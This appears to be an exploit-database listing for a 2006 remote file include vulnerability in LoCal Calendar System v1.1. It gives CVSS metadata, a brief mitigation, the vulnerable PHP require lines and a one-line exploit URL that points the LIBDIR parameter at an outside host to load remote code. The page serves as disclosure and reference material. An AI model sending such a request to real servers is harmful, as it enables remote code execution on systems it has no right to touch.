header-logo
Suggest Exploit
vendor:
LoCal
by:
o0xxdark0o
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: LoCal
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

local Calendar System v1.1 (lcUser.php) Remote File Include

An advanced instrumentation reservation system for equipment calendaring and user management is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

The application should be configured to only include files from trusted sources. Additionally, the application should be configured to validate user input and filter out malicious requests.
Source

Exploit-DB raw data:

+-------------------------------------------------------------------------------------------
local Calendar System v1.1 (lcUser.php) Remote File Include
---------------------------------------------------------------------------------------------
An advanced instrumentation reservation system for equipment calendaring and user management.
--------------------------------------------------------------------------------------------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
--------------------------------------------------------------------------------------------
screenshot : http://www.loci.wisc.edu/calendar/tutorial/monthview.jpg
--------------------------------------------------------------------------------------------
code :
require "$LIBDIR/lcMembership.inc";
require "$LIBDIR/lcErrorChecker.inc";
--------------------------------------------------------------------------------------------
exploit:
local/lib/lcUser.php?LIBDIR=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
--------------------------------------------------------------------------
greetz :
:( no one
-------------------------------------------------------------------------
by o0xxdark0o
i think... so that... i m here
o0xxdark0o@msn.com
##---------------------------------------------------------------------------------------------------

# milw0rm.com [2006-10-18]

Navigation

Suggest Exploit

Services By CQR